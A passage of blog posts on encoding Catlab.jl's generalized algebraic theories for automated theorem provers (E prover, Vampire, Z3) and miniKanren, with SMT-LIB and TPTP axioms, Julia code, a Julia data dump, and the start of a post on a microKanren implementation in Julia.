     :pattern ((compose (mcopy C) (otimes f g)) (Hom C A) (Hom C B)))))
(assert (forall ((A Ob) (B Ob))
  (! (= (proj1 A B) (otimes (id A) (delete B)))
     :pattern ((proj1 A B))
     :pattern ((otimes (id A) (delete B))))))
(assert (forall ((A Ob) (B Ob))
  (! (= (proj2 A B) (otimes (delete A) (id B)))
     :pattern ((proj2 A B))
     :pattern ((otimes (delete A) (id B))))))
(assert (forall ((A Ob) (B Ob) (f Hom))
  (! (=> (and (= (typo f) (Hom A B)))
         (= (compose f (mcopy B)) (compose (mcopy A) (otimes f f))))
     :pattern ((compose f (mcopy B)) (Hom A B))
     :pattern ((compose (mcopy A) (otimes f f)) (Hom A B)))))
(assert (forall ((A Ob) (B Ob) (f Hom))
  (=> (and (= (typo f) (Hom A B))) (= (compose f (delete B)) (delete A)))))
(assert (= (typo (pair (proj1 A B) (proj2 A B))) (Hom (otimes A B) (otimes A B))))
(assert (= (typo (proj1 A B)) (Hom (otimes A B) A)))
(assert (= (typo A) Ob))
(assert (= (typo B) Ob))
(assert (= (typo (proj2 A B)) (Hom (otimes A B) B)))
(assert (= (typo A) Ob))
(assert (= (typo B) Ob))
(assert (= (typo (otimes (id A) (id B))) (Hom (otimes A B) (otimes A B))))
(assert (= (typo (id A)) (Hom A A)))
(assert (= (typo A) Ob))
(assert (= (typo (id B)) (Hom B B)))
(assert (= (typo B) Ob))
(assert (not (= (pair (proj1 A B) (proj2 A B)) (otimes (id A) (id B)))))
(check-sat)

Other junk

One could use z3 as glue for simple steps of proofs as is, but it doesn’t appear to scale well to even intermediately complex proofs. Maybe this could be used for a semi-automated (aka interactive) proof system for catlab? This seems misguided though. You’re better off using one of the many interactive proof assistants if that’s the way you wanna go. Maybe one could generate the queries to those system?

I tried the type tagging version, where every term t is recursively replaced with tag(t, typo_t). This allows us to avoid the guards and the axioms of the GAT take the form of pure equations again, albeit ones of complex tagged terms. This did not work well. I was surprised. It’s kind of interesting that type tagging is in some sense internalizing another piece of Catlab syntax into a logic, just like how type guards internalized the turnstile as an implication and the context as the guard. In this case we are internalizing the inline type annotations (f::Hom(A,B)) into the logic, where I write the infix notation :: as the function tag().

Notebook here https://github.com/philzook58/thoughtbooks/blob/master/catlab_gat.ipynb

file:///home/philip/Downloads/A_Polymorphic_Intermediate_Verification_Language_D.pdf The 3.1 method. If we have an extra argument to every function for the type of that argument inserted, then quantifier instantiation can only work when the

We could make it semi interactive (I guess semi interactive is just interactive though

https://hal.inria.fr/hal-01322328/document TLA+ encoding. Encoding to SMT solvers is a grand tradition

Wait, could it be that id really is the only problem? It’s the only equation with a raw variable in an equality. And that poisons all of Hom. Fascinating. I thought the problem was compose, but it’s id?

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC7324017/ vampire now supports polymorphism.

I realized that things that felt like a single step, were in fact not. This is because

Asserting the types of all subexpressions helped the solver sometimes and sometime hurt.

Solvers often use a heuristic where they want to look at the oldest generated inferences first. This means that the deeper you make your proof, the hard it is to for the solver to find it (well that’s true anyway). Making the proof depth harder for trivial type inference purposes is foolish.

Of course, taken to some extreme, at a certain point we’re asserting so many derived facts to the solver we have written a fraction of a solver ourselves.

I wonder what the recent burst of higher order capabilities of zipperposition, eprover, and vampire might do for me? The thing is we’re already compiling to combinators. That’s what categories are. https://matryoshka-project.github.io/

Functor example http://page.mi.fu-berlin.de/cbenzmueller/papers/J22.pdf THF is higher order format of tptp.

Exporting to Isabelle in particular is a viable approach, as it is well known to have good automation. I mean, I’m reading the sledgehammer guy’s papers for tips. Also, exporting to an interactive theorem prover of any kind seems kind of useful.

Edit: Tom writes with an interesting suggestion:

Hi!

Stumbled across your blog and saw a line [0]:

“Z3 debugging is similar to prolog debugging since it’s declarative. […] Take out asserts. Eventually, if you take out enough, an unsat problem should turn sat. That may help you isolate problematic axiom”

Do you know about “get-unsat-core”? It’ll tell you exactly which clauses cause conflicts/unsat.

You can use it like:

    $ z3 -smt2 -in
    (set-option :produce-unsat-cores true)
    (declare-const a Int)
    (declare-const b Int)
    (declare-const c Int)
    (assert (! (< a b) :named a0))
    (assert (! (< b c) :named a1))
    (assert (! (< b a) :named a2))
    (check-sat)
    unsat
    (get-unsat-core)
    (a0 a2)

Tom

Notes on Synthesis and Equation Proving for Catlab.jl

Catlab is a library and growing ecosystem (I guess the ecosystem is called AlgebraicJulia now) for computational or applied category theory, whatever that may end up meaning.

I have been interested to see if I could find low hanging fruit by applying off the shelf automated theorem proving tech to Catlab.jl.

There area couple problems that seem like some headway might be made in this way:

  • Inferring the type of expressions. Catlab category syntax is pretty heavily annotated by objects so this is relatively easy. (id is explicitly tagged by the object at which it is based for example)
  • Synthesizing morphisms of a given type.
  • Proving equations

In particular two promising candidates for these problems are to use eprover/vampire style automated theorem provers or prolog/kanren logic programming.

Generalized Algebraic Theories (GATs)

Catlab is built around something known as a Generalized Algebraic Theory. https://algebraicjulia.github.io/Catlab.jl/dev/#What-is-a-GAT? In order to use more conventional tooling, we need to understand GATs in a way that is acceptable to these tools. Basically, can we strip the GAT down to first order logic?

I found GATs rather off putting at first glance. Who ordered that? The nlab article is 1/4 enlightening and 3/4 obscuring. https://ncatlab.org/nlab/show/generalized+algebraic+theory But, in the end of the day, I think it it’s not such a crazy thing.

Because of time invested and natural disposition, I understand things much better when they are put in programming terms. As seems to be not uncommon in Julia, one defines a theory in Catlab using some specialized macro mumbo jumbo.

@theory Category{Ob,Hom} begin
  @op begin
    (→) := Hom
    (⋅) := compose
  end

  Ob::TYPE
  Hom(dom::Ob, codom::Ob)::TYPE

  id(A::Ob)::(A → A)
  compose(f::(A → B), g::(B → C))::(A → C) ⊣ (A::Ob, B::Ob, C::Ob)

  (f ⋅ g) ⋅ h == f ⋅ (g ⋅ h) ⊣ (A::Ob, B::Ob, C::Ob, D::Ob,
                                f::(A → B), g::(B → C), h::(C → D))
  f ⋅ id(B) == f ⊣ (A::Ob, B::Ob, f::(A → B))
  id(A) ⋅ f == f ⊣ (A::Ob, B::Ob, f::(A → B))
end

Ok, but this macro boils down to a data structure describing the syntax, typing relations, and axioms of the theory. This data structure is not necessarily meant to be used by end users, and may change in it’s specifics, but I find it clarifying to see it.

Just like my python survival toolkit involves calling dir on everything, my Julia survival toolkit involves hearty application of dump and @macroexpand on anything I can find.

We can see three slots for types terms and axioms. The types describe the signature of the types, how many parameters they have and of what type. The terms describe the appropriate functions and constants of the theory. It’s all kind of straightforward I think. Try to come up with a data structure for this and you’ll probably come up with something similar

I’ve cut some stuff out of the dump because it’s so huge. I’ve placed the full dump at the end of the blog post.

>>> dump(theory(Category))

Catlab.GAT.Theory
  types: Array{Catlab.GAT.TypeConstructor}((2,))
    1: Catlab.GAT.TypeConstructor
      name: Symbol Ob
      params: Array{Symbol}((0,))
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        keys: Array{Symbol}((0,))
        vals: Array{Union{Expr, Symbol}}((0,))
        ndel: Int64 0
        dirty: Bool false
      doc: String " Object in a category "
    2: ... More stuff
  terms: Array{Catlab.GAT.TermConstructor}((2,))
    1: Catlab.GAT.TermConstructor
      name: Symbol id
      params: Array{Symbol}((1,))
        1: Symbol A
      typ: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol Hom
          2: Symbol A
          3: Symbol A
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        keys: Array{Symbol}((1,))
          1: Symbol A
        vals: Array{Union{Expr, Symbol}}((1,))
          1: Symbol Ob
        ndel: Int64 0
        dirty: Bool true
      doc: Nothing nothing
    2: ... More stuff
  axioms: Array{Catlab.GAT.AxiomConstructor}((3,))
    1: Catlab.GAT.AxiomConstructor
      name: Symbol ==
      left: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol compose
          2: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol compose
              2: Symbol f
              3: Symbol g
          3: Symbol h
      right: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol compose
          2: Symbol f
          3: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol compose
              2: Symbol g
              3: Symbol h
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[5, 0, 0, 0, 1, 0, 4, 0, 2, 7, 0, 6, 0, 0, 0, 3]
        keys: Array{Symbol}((7,))
          1: Symbol A
          2: Symbol B
          3: Symbol C
          4: Symbol D
          5: Symbol f
          6: Symbol g
          7: Symbol h
        vals: Array{Union{Expr, Symbol}}((7,))
          1: Symbol Ob
          2: Symbol Ob
          3: Symbol Ob
          4: Symbol Ob
          5: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol A
              3: Symbol B
          6: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol B
              3: Symbol C
          7: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol C
              3: Symbol D
        ndel: Int64 0
        dirty: Bool true
      doc: Nothing nothing
    2: ... More stuff
  aliases: ... Stuff

This infrastructure is not necessarily for category theory alone despite being in a package called Catlab. You can describe other algebraic theories, like groups, but you won’t need the full flexibility in typing relations that the “Generalized” of the GAT gets you. The big hangup of category theory that needs this extra power is that categorical composition is a partial function. It is only defined for morphisms whose types line up correctly, whereas any two group elements can be multiplied.

@theory Group(G) begin

  G::TYPE

  id()::G
  mul(f::G, g::G)::G
  inv(x::G)::G

  mul(mul(f, g), h) == mul(f,  mul(g , h)) ⊣ ( f::G, g::G, h::G)
   # and so on
end

Back to the first order logic translation. If you think about it, the turnstile ⊣ separating the context appearing in the Catlab theory definition is basically an implication. The definition id(A)::Hom(A,A) ⊣ (A::Ob) can be read like so: for all A, given A has type Ob it implies that id(A) has type Hom(A,A). We can write this in first order logic using a predicate for the typing relation. \forall A,  type(A,Ob) \implies type(id(A), Hom(A,A)).

The story I tell about this is that the way this deals with the partiality of compose is that when everything is well typed, compose behaves as it axiomatically should, but when something is not well typed, compose can return total garbage. This is one way to make a partial function total. Just define it to return random trash for the undefined domain values or rather be unwilling to commit to what it does in that case.

Even thought they are the same thing, I have great difficulty getting over the purely syntactical barrier of _::_ vs type(_,_). Infix punctuation never feels like a predicate to me. Maybe I’m crazy.

Turnstiles in general are usually interchangeable with or reflections of implication in some sense. So are the big horizontal lines of inference rules for that matter. I find this all very confusing.

Everything I’ve said above is a bold claim that could be actually proven by demonstrating a rigorous correspondence, but I don’t have enough interest to overcome the tremendous skill gap I’m lacking needed to do so. It could very easily be that I’m missing subtleties.

Automated Theorem Provers

While the term automated theorem prover could describe any theorem prover than is automated, it happens to connote a particular class of first order logic automated provers of which the E prover and Vampire are canonical examples.

In a previous post, I tried axiomatizing category theory to these provers in a different way https://www.philipzucker.com/category-theory-in-the-e-automated-theorem-prover/ , with a focus on the universal properties of categorical constructions. Catlab has a different flavor and a different encoding seems desirable.

What is particularly appealing about this approach is that these systems are hard wired to handle equality efficiently. So they can handle the equational specification of a Catlab theory. I don’t currently know to interpret to proofs it outputs into something more human comprehensible.

Also, I wasn’t originally aware of this, but eprover has a mode --conjectures-are-questions that will return the answers to existential queries. In this way, eprover can be used as a synthesizer for morphisms of a particular type. This flag gives eprover query capabilities similar to a prolog.

eprover cartcat.tptp --conjectures-are-questions --answers=1 --silent

One small annoying hiccup is that TPTP syntax takes the prolog convention of making quantified variables capitalized. This is not the Catlab convention. A simple way to fix this is to append a prefix of Var* to quantified objects and const* to constant function symbols.

All of the keys in the context dictionary are the quantified variables in an declaration. We can build a map to symbols where they are prefixed with Var

varmap = Dict(map(kv -> kv[1] => Symbol("Var$(kv[1])")  , collect(myterm.context )))

And then we can use this map to prefixify other expressions.

prefixify(x::Symbol, varmap) = haskey(varmap,x) ?  varmap[x] : Symbol( "const$x")
prefixify(x::Expr, varmap) = Expr(x.head, map(y -> prefixify(y, varmap),  x.args)... )

Given these, it has just some string interpolation hackery to port a catlab typing definition into a TPTP syntax axiom about a typing relation

function build_typo(terms)
    map(myterm ->  begin
                varmap = Dict(map(kv -> kv[1] => Symbol("Var$(kv[1])")  , collect(myterm.context )))
                prefix_context = Dict(map(kv -> kv[1] => prefixify(kv[2] , varmap) , collect(myterm.context )))
                context_terms = map( kv -> "typo($(varmap[kv[1]]), $(kv[2]))", collect(prefix_context))
                conc = "typo( const$(myterm.name)($(join(map(p -> prefixify(p,varmap) , myterm.params), ", "))) , $(prefixify(myterm.typ, varmap)) )"
                if length(myterm.context) > 0
                    "
                    ![$(join(values(varmap),","))]: 
                        ($conc <=
                            ($(join( context_terms , " &\n\t"))))"
                else # special case for empty context
                    "$conc"
                end
                    end
    , terms)
end

You can spit out the axioms for a theory like so

query = join(map(t -> "fof( axiom$(t[1]) , axiom, $(t[2]) ).", enumerate(build_typo(theory(CartesianCategory).terms))), "\n")
fof( axiom1 , axiom, 
![VarA]: 
    (typo( constid(VarA) , constHom(VarA, VarA) ) <=
        (typo(VarA, constOb))) ).
fof( axiom2 , axiom, 
![Varf,VarA,VarB,Varg,VarC]: 
    (typo( constcompose(Varf, Varg) , constHom(VarA, VarC) ) <=
        (typo(Varf, constHom(VarA, VarB)) &
	typo(VarA, constOb) &
	typo(VarB, constOb) &
	typo(Varg, constHom(VarB, VarC)) &
	typo(VarC, constOb))) ).
fof( axiom3 , axiom, 
![VarA,VarB]: 
    (typo( constotimes(VarA, VarB) , constOb ) <=
        (typo(VarA, constOb) &
	typo(VarB, constOb))) ).
fof( axiom4 , axiom, 
![Varf,VarA,VarD,VarB,Varg,VarC]: 
    (typo( constotimes(Varf, Varg) , constHom(constotimes(VarA, VarC), constotimes(VarB, VarD)) ) <=
        (typo(Varf, constHom(VarA, VarB)) &
	typo(VarA, constOb) &
	typo(VarD, constOb) &
	typo(VarB, constOb) &
	typo(Varg, constHom(VarC, VarD)) &
	typo(VarC, constOb))) ).
fof( axiom5 , axiom, typo( constmunit() , constOb ) ).
fof( axiom6 , axiom, 
![VarA,VarB]: 
    (typo( constbraid(VarA, VarB) , constHom(constotimes(VarA, VarB), constotimes(VarB, VarA)) ) <=
        (typo(VarA, constOb) &
	typo(VarB, constOb))) ).
fof( axiom7 , axiom, 
![VarA]: 
    (typo( constmcopy(VarA) , constHom(VarA, constotimes(VarA, VarA)) ) <=
        (typo(VarA, constOb))) ).
fof( axiom8 , axiom, 
![VarA]: 
    (typo( constdelete(VarA) , constHom(VarA, constmunit()) ) <=
        (typo(VarA, constOb))) ).
fof( axiom9 , axiom, 
![Varf,VarA,VarB,Varg,VarC]: 
    (typo( constpair(Varf, Varg) , constHom(VarA, constotimes(VarB, VarC)) ) <=
        (typo(Varf, constHom(VarA, VarB)) &
	typo(VarA, constOb) &
	typo(VarB, constOb) &
	typo(Varg, constHom(VarA, VarC)) &
	typo(VarC, constOb))) ).
fof( axiom10 , axiom, 
![VarA,VarB]: 
    (typo( constproj1(VarA, VarB) , constHom(constotimes(VarA, VarB), VarA) ) <=
        (typo(VarA, constOb) &
	typo(VarB, constOb))) ).
fof( axiom11 , axiom, 
![VarA,VarB]: 
    (typo( constproj2(VarA, VarB) , constHom(constotimes(VarA, VarB), VarB) ) <=
        (typo(VarA, constOb) &
	typo(VarB, constOb))) ).

% example synthesis queries
%fof(q , conjecture, ?[F]: (typo( F, constHom(a , a) )  <=  ( typo(a, constOb)  )   ) ).
%fof(q , conjecture, ?[F]: (typo( F, constHom( constotimes(a,b) , constotimes(b,a)) )  <=  ( typo(a, constOb) & typo(b,constOb) )   ) ).
%fof(q , conjecture, ?[F]: (typo( F, constHom( constotimes(a,constotimes(b,constotimes(c,d))) , d) )  <=  ( typo(a, constOb) & typo(b,constOb) & typo(c,constOb) & typo(d,constOb) )   ) ). % this one hurts already without some axiom pruning

For dealing with the equations of the theory, I believe we can just ignore the typing relations. Each equation axiom preserves well-typedness, and as long as our query is also well typed, I don’t think anything will go awry. Here it would be nice to have the proof output of the tool be more human readable, but I don’t know how to do that yet. Edit: It went awry. I currently think this is completely wrong.

function build_eqs(axioms)
        map(axiom -> begin
            @assert axiom.name == :(==)
            varmap = Dict(map(kv -> kv[1] => Symbol("Var$(kv[1])")  , collect(axiom.context )))
            l = prefixify(axiom.left, varmap)
            r = prefixify(axiom.right, varmap)
            "![$(join(values(varmap), ", "))]: $l = $r" 
            end,
        axioms)
end

t = join( map( t -> "fof( axiom$(t[1]), axiom, $(t[2]))."  , enumerate(build_eqs(theory(CartesianCategory).axioms))), "\n")
print(t)
fof( axiom1, axiom, ![Varf, VarA, VarD, VarB, Varh, Varg, VarC]: constcompose(constcompose(Varf, Varg), Varh) = constcompose(Varf, constcompose(Varg, Varh))).
fof( axiom2, axiom, ![Varf, VarA, VarB]: constcompose(Varf, constid(VarB)) = Varf).
fof( axiom3, axiom, ![Varf, VarA, VarB]: constcompose(constid(VarA), Varf) = Varf).
fof( axiom4, axiom, ![Varf, VarA, VarB, Varg, VarC]: constpair(Varf, Varg) = constcompose(constmcopy(VarC), constotimes(Varf, Varg))).
fof( axiom5, axiom, ![VarA, VarB]: constproj1(VarA, VarB) = constotimes(constid(VarA), constdelete(VarB))).
fof( axiom6, axiom, ![VarA, VarB]: constproj2(VarA, VarB) = constotimes(constdelete(VarA), constid(VarB))).
fof( axiom7, axiom, ![Varf, VarA, VarB]: constcompose(Varf, constmcopy(VarB)) = constcompose(constmcopy(VarA), constotimes(Varf, Varf))).
fof( axiom8, axiom, ![Varf, VarA, VarB]: constcompose(Varf, constdelete(VarB)) = constdelete(VarA)).

% silly example query
fof( q, conjecture, ![Varf, Varh, Varg, Varj ]: constcompose(constcompose(constcompose(Varf, Varg), Varh), Varj) = constcompose(Varf, constcompose(Varg, constcompose(Varh,Varj)) )).

It is possible and perhaps desirable fully automating the call to eprover as an external process and then parsing the results back into Julia. Julia has some slick external process facilities https://docs.julialang.org/en/v1/manual/running-external-programs/

Prolog and Kanrens

It was an interesting revelation to me that the typing relations for morphisms as described in catlab seems like it is already basically in the form amenable to prolog or a Kanren. The variables are universally quantified and there is only one term to the left of the turnstile (which is basically prolog’s :-) This is a Horn clause.

In a recent post I showed how to implement something akin to a minikanren in Julia https://www.philipzucker.com/yet-another-microkanren-in-julia/ I built that with this application in mind

Here’s an example I wrote by hand in in minikaren

(define (typo f t)
(conde
  [(fresh (a) (== f 'id) (== t `(hom ,a ,a))) ]
  [(== f 'f) (== t '(hom a c))]
  [(fresh (a b) (== f 'snd) (== t `(hom ( ,a ,b) ,b)))]
  [(fresh (a b) (== f 'fst) (== t `(hom ( ,a ,b) ,a)))]
  [(fresh (g h a b c) (== f `(comp ,g ,h))
                       (== t `(hom ,a ,c)) 
                       (typo g `(hom ,a ,b ))
                       (typo h `(hom ,b ,c)))]
  [ (fresh (g h a b c) (== f `(fan ,g ,h))
                       (== t `(hom ,a (,b ,c))) 
                       (typo g `(hom ,a ,b ))
                       (typo h `(hom ,a ,c)))  ]
  )
  )

;queries
; could lose the hom
;(run 3 (q) (typo  q '(hom (a b) a)))
;(run 3 (q) (typo  q '(hom ((a b) c) a)))
(run 3 (q) (typo  q '(hom (a b) (b a))))

And here is a similar thing written in my Julia minikanren. I had to depth limit it because I goofed up the fair interleaving in my implementation.

function typo(f, t, n)
    fresh2( (a,b) -> (f ≅ :fst) ∧ (t  ≅ :(Hom(tup($a,$b),$a)))) ∨
    fresh2( (a,b) -> (f ≅ :snd) ∧ (t  ≅ :(Hom(tup($a,$b),$b)))) ∨
    freshn( 6, (g,h,a,b,c,n2) -> (n ≅ :(succ($n2))) ∧ (f ≅ :(comp($g, $h)))  ∧ (t  ≅ :(Hom($a,$c))) ∧ @Zzz(typo(g, :(Hom($a,$b)), n2))  ∧ @Zzz(typo(h, :(Hom($b,$c)), n2))) ∨
    fresh(a -> (f ≅ :(id($a))) ∧ (t  ≅ :(Hom($a,$a))))
end


run(1, f ->  typo( f  , :(Hom(tup(a,tup(b,tup(c,d))),d)), nat(5)))

Bits and Bobbles

Discussion on the Catlab zulip. Some interesting discussion here such as an alternative encoding of GATs to FOL https://julialang.zulipchat.com/#narrow/stream/230248-catlab.2Ejl/topic/Automatic.20Theorem.20Proving/near/207919104

Of course, it’d be great it these solvers were bullet proof. But they aren’t. They are solving very hard questions more or less by brute force. So the amount of scaling they can achieve can be resolved by experimentation only. It may be that using these solvers is a dead end. These solvers do have a number of knobs to turn. The command line argument list to eprover is enormous.

These solvers are all facing some bad churn problems

  • Morphism composition is known to be a thing that makes dumb search go totally off the rails.
  • The identity morphism can be composed arbitrary number of times. This also makes solvers churn
  • Some catlab theories are overcomplete.
  • Some catlab theories are capable are building up and breaking down the same thing over and over (complicated encodings of id like pair(fst,snd))).

use SMT? https://github.com/ahumenberger/Z3.jl SMT is capable of encoding the equational problems if you use quantifiers (which last I checked these bindings do not yet export) . Results may vary. SMT with quantifiers is not the place where they shine the most. Is there anything else that can be fruitfully encoded to SMT? SAT?

Custom heuristics for search. Purely declarative is too harsh a goal. Having pure Julia solution is important here.

GAP.jl https://github.com/oscar-system/GAP.jl has facilities for knuth-bendix. This might be useful for finitely presented categories. It would be interesting to explore what pieces of computational group theory are applicable or analogous to computational category theory

>>> dump(theory(Category))

Catlab.GAT.Theory
  types: Array{Catlab.GAT.TypeConstructor}((2,))
    1: Catlab.GAT.TypeConstructor
      name: Symbol Ob
      params: Array{Symbol}((0,))
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        keys: Array{Symbol}((0,))
        vals: Array{Union{Expr, Symbol}}((0,))
        ndel: Int64 0
        dirty: Bool false
      doc: String " Object in a category "
    2: Catlab.GAT.TypeConstructor
      name: Symbol Hom
      params: Array{Symbol}((2,))
        1: Symbol dom
        2: Symbol codom
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0]
        keys: Array{Symbol}((2,))
          1: Symbol dom
          2: Symbol codom
        vals: Array{Union{Expr, Symbol}}((2,))
          1: Symbol Ob
          2: Symbol Ob
        ndel: Int64 0
        dirty: Bool true
      doc: String " Morphism in a category "
  terms: Array{Catlab.GAT.TermConstructor}((2,))
    1: Catlab.GAT.TermConstructor
      name: Symbol id
      params: Array{Symbol}((1,))
        1: Symbol A
      typ: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol Hom
          2: Symbol A
          3: Symbol A
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        keys: Array{Symbol}((1,))
          1: Symbol A
        vals: Array{Union{Expr, Symbol}}((1,))
          1: Symbol Ob
        ndel: Int64 0
        dirty: Bool true
      doc: Nothing nothing
    2: Catlab.GAT.TermConstructor
      name: Symbol compose
      params: Array{Symbol}((2,))
        1: Symbol f
        2: Symbol g
      typ: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol Hom
          2: Symbol A
          3: Symbol C
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[4, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 5, 0, 0, 0, 3]
        keys: Array{Symbol}((5,))
          1: Symbol A
          2: Symbol B
          3: Symbol C
          4: Symbol f
          5: Symbol g
        vals: Array{Union{Expr, Symbol}}((5,))
          1: Symbol Ob
          2: Symbol Ob
          3: Symbol Ob
          4: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol A
              3: Symbol B
          5: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol B
              3: Symbol C
        ndel: Int64 0
        dirty: Bool true
      doc: Nothing nothing
  axioms: Array{Catlab.GAT.AxiomConstructor}((3,))
    1: Catlab.GAT.AxiomConstructor
      name: Symbol ==
      left: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol compose
          2: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol compose
              2: Symbol f
              3: Symbol g
          3: Symbol h
      right: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol compose
          2: Symbol f
          3: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol compose
              2: Symbol g
              3: Symbol h
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[5, 0, 0, 0, 1, 0, 4, 0, 2, 7, 0, 6, 0, 0, 0, 3]
        keys: Array{Symbol}((7,))
          1: Symbol A
          2: Symbol B
          3: Symbol C
          4: Symbol D
          5: Symbol f
          6: Symbol g
          7: Symbol h
        vals: Array{Union{Expr, Symbol}}((7,))
          1: Symbol Ob
          2: Symbol Ob
          3: Symbol Ob
          4: Symbol Ob
          5: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol A
              3: Symbol B
          6: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol B
              3: Symbol C
          7: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol C
              3: Symbol D
        ndel: Int64 0
        dirty: Bool true
      doc: Nothing nothing
    2: Catlab.GAT.AxiomConstructor
      name: Symbol ==
      left: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol compose
          2: Symbol f
          3: Expr
            head: Symbol call
            args: Array{Any}((2,))
              1: Symbol id
              2: Symbol B
      right: Symbol f
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[3, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0]
        keys: Array{Symbol}((3,))
          1: Symbol A
          2: Symbol B
          3: Symbol f
        vals: Array{Union{Expr, Symbol}}((3,))
          1: Symbol Ob
          2: Symbol Ob
          3: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol A
              3: Symbol B
        ndel: Int64 0
        dirty: Bool true
      doc: Nothing nothing
    3: Catlab.GAT.AxiomConstructor
      name: Symbol ==
      left: Expr
        head: Symbol call
        args: Array{Any}((3,))
          1: Symbol compose
          2: Expr
            head: Symbol call
            args: Array{Any}((2,))
              1: Symbol id
              2: Symbol A
          3: Symbol f
      right: Symbol f
      context: OrderedCollections.OrderedDict{Symbol,Union{Expr, Symbol}}
        slots: Array{Int32}((16,)) Int32[3, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0]
        keys: Array{Symbol}((3,))
          1: Symbol A
          2: Symbol B
          3: Symbol f
        vals: Array{Union{Expr, Symbol}}((3,))
          1: Symbol Ob
          2: Symbol Ob
          3: Expr
            head: Symbol call
            args: Array{Any}((3,))
              1: Symbol Hom
              2: Symbol A
              3: Symbol B
        ndel: Int64 0
        dirty: Bool true
      doc: Nothing nothing
  aliases: Dict{Symbol,Symbol}
    slots: Array{UInt8}((16,)) UInt8[0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
    keys: Array{Symbol}((16,))
      1: Symbol ⋅
      2: #undef
      3: #undef
      4: #undef
      5: #undef
      ...
      12: #undef
      13: #undef
      14: #undef
      15: #undef
      16: #undef
    vals: Array{Symbol}((16,))
      1: Symbol compose
      2: #undef
      3: #undef
      4: #undef
      5: #undef
      ...
      12: #undef
      13: #undef
      14: #undef
      15: #undef
      16: #undef
    ndel: Int64 0
    count: Int64 2
    age: UInt64 0x0000000000000002
    idxfloor: Int64 1
    maxprobe: Int64 0

Yet Another MicroKanren in Julia

Minikanren is a relation and logic programming language similar in many respects to prolog. It’s designed to be lightweight and embeddable in other host languages.

There is a paper about a minimal implementation call MicroKanren that has spawned many derivatives. It’s impressively short. http://webyrd.net/scheme-2013/papers/HemannMuKanren2013.pdf .

I’m intrigued about such things and have my reasons for building a version of this in Julia (perhaps as an inference engine for Catlab stuff? More on that another day). There are already some implementations, but I’m opinionated and I really wanted to be sure I know how the guts work. Best way is to DIY.

There are at least 3 already existing implementations in Julia alone.

Logic programming consists of basically two pieces, search and unification. The search shows up as a stream. MiniKanren does a kind of clever search by interleaving looking at different branches. This stops it from getting stuck in a bad infinite branch in principle. The interleaving is kind of like a riffled list append.

interleave [] ys = ys
interleave (x:xs)  = x : interleave ys xs 

But then the actual streams used in Kanren have thunks lying around in them that also need to get forced. These thunk positions are where it chooses to switch over to another branch of the search.

Unification is comparing two syntax trees with variables in them. As you scan down them, you can identify which variables correspond to which subtrees in the other structure. You may find a contradictory assignment, or only a partial assignment. I talked more about unification here. Kanren uses triangular substitutions to record the variable assignments. These subsitutions are very convenient to make, but when you want to access a variable, you have to walk through the substitution. It’s a tradeoff.

Here we start describing my Julia implementation. Buyer beware. I’ve been finding very bad bugs very recently.

I diverged from microKanren in a couple ways. I wanted to not use a list based structure for unification. I feel like the most Julian thing to do is to use the Expr data structure that is built by Julia quotation :. You can see here that I tried to use a more imperative style where I could figure out how to, which I think is more idiomatic Julia.

struct Var 
    x::Symbol
end

function walk(s,u) 
    while isa(u,Var) && haskey(s,u)
            u = get(s,u)
    end
    return u
end

